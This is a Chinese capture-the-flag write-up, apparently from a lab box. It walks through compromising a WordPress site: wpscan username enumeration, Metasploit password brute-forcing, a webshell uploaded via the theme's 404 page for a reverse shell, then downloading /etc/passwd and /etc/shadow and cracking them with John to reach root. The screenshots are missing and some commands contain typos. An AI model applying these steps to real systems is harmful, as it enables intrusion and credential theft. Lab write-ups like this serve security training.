zoukankan      html  css  js  c++  java
  • ctf-web-WEB安全暴力破解(wp破解、passwd和shadow破解)思路笔记

    1. 信息探测

      1. image
      2. 分析结果,挖掘可利用信息
        1. 发现敏感文件,发现登陆界面:image
    2. 使用wpScan对站点用户名进行枚举

      1. 输入wpscan查看可使用的命令image
      2. image
      3. 初次使用wpscan需要更新,过程有点缓慢
      4. 获得用户名:admin
    3. 使用metasploit对wordpress站点进行暴力密码破解

      1. 启动Metasploit –> msfconsole
      2. msf > use auxilicry /scanner/http/wordpress_login_enum
      3. msf auxiliary(wordpress_login_enuml> set username adlmin
      4. msf auxiliary(wordpress_login_enum)> set pass_file /usr/share/wordlists/cirb/common.txt
      5. msf auxiliary(wordpress_login_enum) > set targeturi /secret/
      6. msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
      7. msf cuxiliary(wordpress_login_enum) > run
      8. 获得用户名和密码image
      9. 使用用户名和密码进行登陆
    4. 上传webshell获取控制权

      1. 生成shell:image
      2. 通过404页面上传shell:image
      3. 设置启动监听:image
      4. 访问404.php执行shell,获得反弹shellimage
      5. 查看系统信息sysinfo
      6. 加载shell: shell
      7. id
    5. 使用passwd和shadow提升root权限:

      1. -- Metasploit中利用返回shell下载download /etc/passwd  download /etc/shadow
      2. --将文件转换为join可以识别的文件格式
      3. unshadow passwd shadow > cracked
      4. --使用john破解密码:john crackedimage
      5. shellimage
      6. su- marlinspike
      7. sudo –limage
      8. 获得root:sudo bash
    6. 总结:

      1. 提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
      2. 对于wp的渗透中,启动对应的主题,然后在404页面上传shell;
      3. 渗透流程:发现wordpress-使用wpscan进行用户名枚举-使用msfconsole进行密码爆破-登陆后台-生成shell-启动监听-执行shell-获得反弹shell-下载passwd和shadow-使用passwd和shadow提升root权限-文件转换为join可以识别的文件格式-使用john破解密码-获得用户密码-返回反弹的shell-切换用户-提升权限-获取flag
  • 相关阅读:
    maven公共库
    java截取当前屏幕图片
    JAVE视频处理
    jar在maven仓库里面没有时 , 把jar导入本地仓库步骤
    3 .shell 之linux四剑客sed/grep/awk/find
    Spring学习(四)-基于注解的Bean管理
    Spring学习(三)-Bean的种类,作用域,生命周期
    Spring学习(一)-基本入门
    dubbo服务连接zookeeper报错:java.net.ConnectException: Connection refused
    idea-常用设置二
  • 原文地址:https://www.cnblogs.com/zw7889/p/13595510.html
Copyright © 2011-2022 走看看